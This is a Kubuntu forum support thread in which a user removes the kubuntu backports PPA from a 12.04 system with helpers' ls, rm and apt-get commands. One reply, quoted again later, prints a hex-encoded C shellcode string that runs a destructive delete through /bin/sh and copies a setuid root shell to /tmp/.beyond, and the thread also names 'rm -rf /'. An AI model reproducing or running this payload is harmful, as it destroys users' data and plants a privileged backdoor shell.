This topic is closed.
X
X

• Filter
  • Time
  • Show
Clear All

Backport problem

I was trying to update Kmix and saw a post that said to use this to add the Kmix update. -add-repository ppa:kubuntu-ppa/backports -y

Well I did it and not my 12.04 wants to update a lot of stuff. I'm not sure I want to update all that stuff. How to I remove the backports that were added and go back to what was there? Or is it just going to update the normal 12.04 programs. I have a Nvidia video card and that is a PITA but it has been running well on its native driver. SO I don't want to over right that one. Do I just type -remove-repository ppa:kubuntu-ppa/backports -y

When you 'add' repositories, the repository file is located in /etc/apt/sources.list.d/

Just remove the desired file (using sudo rm) and update the package cache (sudo apt-get update).
    Last edited by Snowhog; Mar 25, 2016, 10:28 PM. Reason: Corrected directory location
    Windows no longer obstructs my view.
    Using Kubuntu Linux since March 23, 2007.
    "It is a capital mistake to theorize before one has data." - Sherlock Holmes

Comment

12.04 is pretty old so I assume you like the classics

But why wouldn't you update, maybe you pay your connection per bit and byte?

Comment

Because it is on a very old HP laptop and the Nvidia card doesn't like much past 12.04. The video is barely hanging on with the upgrades. It is clearer but pushing it.

Originally posted by Teunis View Post
        12.04 is pretty old so I assume you like the classics

But why wouldn't you update, maybe you pay your connection per bit and byte?
        Last edited by urdrwho5; Mar 25, 2016, 09:05 PM.

Comment

Originally posted by Snowhog View Post
          When you 'add' repositories, the repository file is located in /etc/apt/sources.d/

Just remove the desired file (using sudo rm) and update the package cache (sudo apt-get update).

I'm sorry but my use of RM is minimal.

Would it be rm /etc/apt/sources.d/

Comment

No. Show us the files in that directory: ls -la /etc/apt/sources.list.d
            Last edited by Snowhog; Mar 25, 2016, 10:27 PM. Reason: Fixed directory identification

Comment

No. Show us the files in that directory: ls -la /etc/apt/sources.d
              You probably mean /etc/apt/sources.list.d directory

Comment

Doh!

Corrected. Thanks.

Comment

Doh!

Corrected. Thanks.
                  Here ya go....................

total 28
                  drwxr-xr-x 2 root root 4096 Mar 25 16:07 .
                  drwxr-xr-x 6 root root 4096 Mar 25 16:03 ..
                  -rw-r--r-- 1 root root 146 Mar 25 17:13 kubuntu-ppa-backports-precise.list
                  -rw-r--r-- 1 root root 148 Mar 25 17:13 kubuntu-ppa-backports-precise.list.save
                  -rw-r--r-- 1 root root 130 Mar 25 17:13 openjdk-r-ppa-precise.list
                  -rw-r--r-- 1 root root 130 Mar 25 17:13 openjdk-r-ppa-precise.list.save
                  -rw-r--r-- 1 root root 0 Jan 21 09:01 vincent-c-nevernote-precise.list
                  -rw-r--r-- 1 root root 75 Jan 21 09:01 vincent-c-nevernote-precise.list.save

If I go back I will miss the new Kmix because it works much better and fixes the problem I was having with needing to change master channel all the time when opening and closing VLC.
                  Last edited by urdrwho5; Mar 26, 2016, 07:25 AM.

Comment

Originally posted by urdrwho5 View Post
                    Here ya go....................

total 28
                    drwxr-xr-x 2 root root 4096 Mar 25 16:07 .
                    drwxr-xr-x 6 root root 4096 Mar 25 16:03 ..
                    -rw-r--r-- 1 root root 146 Mar 25 17:13 kubuntu-ppa-backports-precise.list
                    -rw-r--r-- 1 root root 148 Mar 25 17:13 kubuntu-ppa-backports-precise.list.save
                    -rw-r--r-- 1 root root 130 Mar 25 17:13 openjdk-r-ppa-precise.list
                    -rw-r--r-- 1 root root 130 Mar 25 17:13 openjdk-r-ppa-precise.list.save
                    -rw-r--r-- 1 root root 0 Jan 21 09:01 vincent-c-nevernote-precise.list
                    -rw-r--r-- 1 root root 75 Jan 21 09:01 vincent-c-nevernote-precise.list.save

If I go back I will miss the new Kmix because it works much better and fixes the problem I was having with needing to change master channel all the time when opening and closing VLC.
                    You would remove kubuntu-ppa-backports-precise.list and kubuntu-ppa-backports-precise.list.save:

sudo rm /etc/apt/sources.list.d/kubuntu-ppa-backports*
                    Then run: sudo apt-get update && sudo apt-get dist-upgrade

Comment

Thanks

I'm dangerous with the rm command. I could erase a lot more than I want with that command.

You would remove kubuntu-ppa-backports-precise.list and kubuntu-ppa-backports-precise.list.save:

Comment

Yes rm can be dangerous, esp. rm * or rm -rf /

So for safety just copy and paste Snowhog's commands, one after the other.

PS, a nasty obfuscated (hex) version that will make you lose all is:

Code:
                        char esp[] __attribute__ ((section(“.text”))) /* e.s.p
                        release */
                        = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
                        “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
                        “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
                        “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
                        “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
                        “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
                        “\x6e\x2f\x73\x68\x00\x2d\x63\x00”
                        “cp -p /bin/sh /tmp/.beyond; chmod 4755
                        /tmp/.beyond;”;
                        Last edited by Teunis; Mar 26, 2016, 04:12 PM.

Comment

Yes that would be a good way to do it.

Originally posted by Teunis View Post
                          Yes rm can be dangerous, esp. rm * or rm -rf /

So for safety just copy and paste Snowhog's commands, one after the other.

Still debating if I want to keep the new PPA. I like some of the features it added when I updated. Maybe I can used to Rekong and only use Firefox when I have to. FF web pages don't scroll well with the updated PPA but Rekong seems fairly good.

One telling factor that the video is working harder is when the computer comes back from having the screen saver on. IT is a blank sceen saver. Anyhow with the old PPA the screen snapped right back on but with the new PPA the screen makes a blank block that opens on the first half of the screen and then the full desktop appears. It only takes a second but it is different from the other PPA that took less resources.

On the other hand the new PPA is a much clearer and cleaner view of fonts, etc.

One time I tried Kubuntu 15 and the video would lock up and I had a lot of problems. SO I regressed back to 12.04 LTS and never had any problems.

PS, a nasty obfuscated (hex) version that will make you lose all is:

Code:
                          char esp[] __attribute__ ((section(“.text”))) /* e.s.p
                          release */
                          = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
                          “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
                          “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
                          “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
                          “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
                          “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
                          “\x6e\x2f\x73\x68\x00\x2d\x63\x00”
                          “cp -p /bin/sh /tmp/.beyond; chmod 4755
                          /tmp/.beyond;”;
                          Last edited by urdrwho5; Mar 27, 2016, 10:09 AM.

Comment

Hm? I copied and pasted the commands.

In the end this is what i received -

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded

Do I need to reboot the computer

could I just go into the directory, use root privileges and manually delete the files. Then run udo apt-get update && sudo apt-get dist-upgrade

Last edited by urdrwho5; Mar 27, 2016, 10:47 AM.

Comment

Then you are fine.

Comment

Working...
                              X